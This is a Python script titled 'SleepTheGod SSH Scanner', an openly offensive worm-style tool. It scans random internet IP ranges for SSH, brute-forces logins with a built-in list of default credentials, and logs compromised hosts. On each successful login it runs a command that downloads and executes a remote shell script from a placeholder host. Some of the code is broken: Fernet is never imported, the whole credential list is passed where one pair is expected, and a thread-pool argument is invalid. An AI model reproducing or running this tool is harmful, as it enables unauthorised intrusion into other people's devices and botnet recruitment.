SleepTheGod SSH Scanner

1. #!/usr/bin/env python3
2.  
3. import paramiko
4. import socket
5. import random
6. import itertools
7. import logging
8. import concurrent.futures
9. from time import sleep
10.  
11. # Configuration
12. LOG_FILE = "ssh_scanner.log"
13. VULNZ_FILE = "vulnz.txt"
14. MAX_THREADS = 50
15. SSH_TIMEOUT = 3
16. SCAN_TIMEOUT = 0.37
17. ENCRYPTION_KEY = Fernet.generate_key()
18. cipher_suite = Fernet(ENCRYPTION_KEY)
19.  
20. # ASCII Art
21. ascii_art = """
22. ███████╗███████╗██╗ ██╗ ███████╗ ██████╗ █████╗ ███╗ ██╗
23. ██╔════╝██╔════╝██║ ██║ ██╔════╝██╔════╝██╔══██╗████╗ ██║
24. ███████╗███████╗███████║ ███████╗██║ ███████║██╔██╗ ██║
25. ╚════██║╚════██║██╔══██║ ╚════██║██║ ██╔══██║██║╚██╗██║
26. ███████║███████║██║ ██║ ███████║╚██████╗██║ ██║██║ ╚████║
27. ╚══════╝╚══════╝╚═╝ ╚═╝ ╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═══╝
28.  
29. ██████╗ ██╗ ██╗ ███████╗██╗ ███████╗███████╗██████╗ ██╗
30. ██╔══██╗╚██╗ ██╔╝ ██╔════╝██║ ██╔════╝██╔════╝██╔══██╗██║
31. ██████╔╝ ╚████╔╝ ███████╗██║ █████╗ █████╗ ██████╔╝██║
32. ██╔══██╗ ╚██╔╝ ╚════██║██║ ██╔══╝ ██╔══╝ ██╔═══╝ ╚═╝
33. ██████╔╝ ██║ ███████║███████╗███████╗███████╗██║ ██╗
34. ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝
35. """
36.  
37. # Command to be executed on successful connection
38. rekdevice = (
39. "cd /tmp; wget http://0.0.0.0/update.sh; "
40. "busybox wget http://0.0.0.0/update.sh; chmod 777 update.sh; "
41. "sh update.sh; rm -f update.sh"
42. )
43.  
44. # Password list
45. passwords = [
46. "root:root", "root:admin", "root:password", "root:default", "root:toor",
47. "admin:admin", "admin:1234", "ubnt:ubnt", "vagrant:vagrant", "root:ubnt",
48. "telnet:telnet", "guest:guest", "root:vagrant", "pi:raspberry", "default:",
49. "admin:password", "cisco:cisco", "root:5up", "user:password", "user:user",
50. "root:debian", "root:alpine", "root:ceadmin", "root:indigo", "root:linux",
51. "root:rootpasswd", "root:timeserver"
52. ]
53.  
54. def encrypt_data(data):
55. """Encrypt data using Fernet symmetric encryption."""
56. return cipher_suite.encrypt(data.encode()).decode()
57.  
58. def decrypt_data(data):
59. """Decrypt data using Fernet symmetric encryption."""
60. return cipher_suite.decrypt(data.encode()).decode()
61.  
62. def ssh_brute(ip, password, log_file):
63. """Attempt to brute-force SSH credentials."""
64. try:
65. ssh = paramiko.SSHClient()
66. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
67. ssh.connect(ip, port=22, username=password.split(":")[0], password=password.split(":")[1], timeout=SSH_TIMEOUT)
68. logging.info(f"Successful login: {password}@{ip}")
69. with open(log_file, "a") as fh:
70. fh.write(f"{password}:{ip}\n")
71. ssh.exec_command(rekdevice)
72. sleep(20)
73. ssh.close()
74. except paramiko.AuthenticationException:
75. logging.debug(f"Authentication failed for {password}@{ip}")
76. except (paramiko.SSHException, socket.error) as e:
77. logging.debug(f"SSH error for {ip}: {e}")
78. except Exception as e:
79. logging.error(f"Unexpected error for {ip}: {e}")
80.  
81. def is_running_ssh(ip):
82. """Check if SSH is running on the given IP address."""
83. try:
84. with socket.create_connection((ip, 22), timeout=SCAN_TIMEOUT):
85. return True
86. except (socket.timeout, ConnectionRefusedError):
87. return False
88.  
89. def ip_range(input_string):
90. """Generate IP addresses within a specified range."""
91. octets = input_string.split('.')
92. chunks = [list(map(int, octet.split('-'))) for octet in octets]
93. ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
94. addresses = ['.'.join(map(str, address)) for address in itertools.product(*ranges)]
95. random.shuffle(addresses)
96. return addresses
97.  
98. def gen_ip():
99. """Generate a random IP address or Bluetooth IP address."""
100. if random.random() < 0.1: # 10% chance to generate Bluetooth IP range
101. return f"192.168.{random.randint(0, 255)}.{random.randint(0, 255)}"
102. first = random.choice(["2", "5", "31", "37", "41", "46", "50", "65", "67", "94", "95", "96", "118", "119", "122", "161", "168", "176", "178", "179", "180", "183", "185", "187", "188", "191", "198", "201"])
103. return f"{first}.{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}"
104.  
105. def hax_thread(passwords, log_file):
106. """Thread function to handle SSH brute-forcing."""
107. while True:
108. try:
109. ip = gen_ip()
110. if is_running_ssh(ip):
111. if is_running_ssh('.'.join(ip.split(".")[:3]) + ".2") and is_running_ssh('.'.join(ip.split(".")[:3]) + ".254"):
112. ssh_brute(ip, passwords, log_file)
113. else:
114. for ip in ip_range('.'.join(ip.split(".")[:3]) + ".0-255"):
115. if is_running_ssh(ip):
116. ssh_brute(ip, passwords, log_file)
117. except Exception as e:
118. logging.error(f"Error in thread: {e}")
119.  
120. def main():
121. """Main function to start threads and manage execution."""
122. print(ascii_art)
123. logging.info("Starting SSH Scanner...")
124.  
125. # Clear log file and vulnerability file
126. with open(LOG_FILE, "w") as _:
127. pass
128. with open(VULNZ_FILE, "w") as _:
129. pass
130.  
131. with concurrent.futures.ThreadPoolExecutor(max_threads=MAX_THREADS) as executor:
132. futures = [executor.submit(hax_thread, passwords, VULNZ_FILE) for _ in range(MAX_THREADS)]
133. concurrent.futures.wait(futures)
134.  
135. if __name__ == "__main__":
136. main()
137.